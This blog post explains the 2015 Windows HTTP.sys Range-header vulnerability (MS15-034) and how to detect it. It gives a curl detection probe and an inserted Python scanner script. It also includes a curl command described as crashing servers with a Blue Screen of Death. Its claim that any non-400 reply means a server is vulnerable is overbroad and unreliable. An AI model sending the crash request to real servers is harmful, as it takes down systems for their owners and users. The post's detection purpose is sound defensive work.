Detecting Microsoft HTTP.sys vulnerability

On April 14th, 2015, Patch Tuesday, Microsoft released a patch for a remote code execution vulnerability in the HTTP.sys module of Windows. The vulnerability affected all versions of Windows, ranging from Windows 7 to Windows servers. Microsoft’s bulletin MS15-034 discussed the vulnerability only briefly and left the details to be revealed by reverse engineering the patch. It was a race against time for people to patch their servers and for attackers to reverse engineer the patch to zero in on the exact vulnerability. The vulnerability was assigned CVE-2015-1635. In this blog post we will see what HTTP.sys is and how to detect the vulnerability. Understandably, the fix was to apply Microsoft’s patch.

What is HTTP.sys?

HTTP.sys is a kernel-mode module that acts as an HTTP listener. Prior to HTTP.sys, Windows used the Windows Sockets API (Winsock), a user-mode component, to receive HTTP requests. Having the HTTP listener in the kernel has the following advantages [1]:

  • Kernel-mode caching: Requests for cached responses are served without switching to user mode.
  • Kernel-mode request queuing: Requests cause less overhead in context switching because the kernel forwards requests directly to the correct worker process. If no worker process is available to accept a request, the kernel-mode request queue holds the request until a worker process picks it up.

For more details on the working and advantages of HTTP.sys, see [2].

Vulnerability

The vulnerability exists in the parsing of the Range header [3] of the HTTP request sent to the server. Sending a Range header with the value bytes=0-18446744073709551615 triggers a buffer overflow, and this can be used as a test to detect the HTTP.sys vulnerability on a server.

The following curl command can be used for testing:

$ curl -v www.example.com -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"

If the response is “HTTP Error 400. The request has an invalid header name.”, the server is patched; any other response indicates the server is still vulnerable.
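The same check as the curl command above, written as a small Python script so it can be run against your own servers from a maintenance box. This is an added example, not code from the post or from Microsoft; the only assumption beyond the post's rule is that a Server banner not containing "Microsoft" means the listener is not HTTP.sys at all, so the "vulnerable" verdict does not apply.

```python
import socket

# Probe from the post: the upper bound 18446744073709551615 is 2**64 - 1
RANGE_PROBE = "bytes=0-18446744073709551615"
# Body fragment HTTP.sys returns once MS15-034 is installed (quoted in the post)
PATCHED_MARKER = "The request has an invalid header name"

def build_probe_request(path: str = "/") -> bytes:
    """Raw HTTP/1.1 request equivalent to the post's curl command."""
    lines = [f"GET {path} HTTP/1.1", "Host: irrelevant",
             f"Range: {RANGE_PROBE}", "Connection: close", "", ""]
    return "\r\n".join(lines).encode("ascii")

def parse_response(raw: bytes):
    """Split a raw response into (status_code, server_banner, body_text)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1", "replace").split("\r\n")
    parts = lines[0].split()
    status = int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else 0
    server = ""
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "server":
            server = value.strip()
    return status, server, body.decode("latin-1", "replace")

def classify_response(status: int, server: str, body: str) -> str:
    """Post's rule: this 400 means patched, anything else means unpatched.
    Added assumption: a Server banner without 'Microsoft' is not HTTP.sys."""
    if status == 400 and PATCHED_MARKER in body:
        return "patched"
    if server and "microsoft" not in server.lower():
        return "not HTTP.sys"
    return "likely vulnerable"

def probe(host: str, port: int = 80, path: str = "/", timeout: float = 5.0) -> str:
    """Send the probe to one of your own servers and classify the reply."""
    raw = b""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(build_probe_request(path))
            while len(raw) < 65536:  # the 400 page is far smaller than this
                chunk = sock.recv(4096)
                if not chunk:
                    break
                raw += chunk
    except OSError:  # refused, reset or timed out: nothing to classify
        if not raw:
            return "no response"
    return classify_response(*parse_response(raw))
```

Call `probe("your-iis-host")` to get one of "patched", "likely vulnerable", "not HTTP.sys" or "no response".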

Sending the following request will cause a Blue Screen of Death (BSoD), thus causing a denial of service.

$ curl -v www.example.com/iis-85.png -H "Host: irrelevant" -H "Range: bytes=20-18446744073709551615"

As per comments on Hacker News [4], the vulnerability affects only those servers on which “Output Cache” or “Enable Kernel Caching” is checked.

There is a ready-to-use tool available on GitHub for testing your server for the HTTP.sys vulnerability.

This attack is similar to the Range attack on Apache servers, which also caused a denial of service [5].

Keep Hacking :D.

REFERENCES:
[1] https://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/a2a45c42-38bc-464c-a097-d7a202092a54.mspx?mfr=true
[2] http://www.codeproject.com/Articles/437733/Demystify-http-sys-with-HttpSysManager
[3] https://tools.ietf.org/html/rfc7233#section-3.1
[4] https://news.ycombinator.com/item?id=9380889
[5] http://seclists.org/fulldisclosure/2011/Aug/175
[6] https://security.stackexchange.com/questions/86201/does-http-sys-vulnerability-affect-windows-not-running-any-webservers
[7] https://isc.sans.edu/forums/diary/MS15034+HTTPsys+IIS+DoS+And+Possible+Remote+Code+Execution+PATCH+NOW/19583/
[8] https://www.reddit.com/r/netsec/comments/32n3m2/cve20151635_rce_in_windows_httpsys/
[9] https://stackoverflow.com/questions/22598350/how-exactly-does-http-sys-work
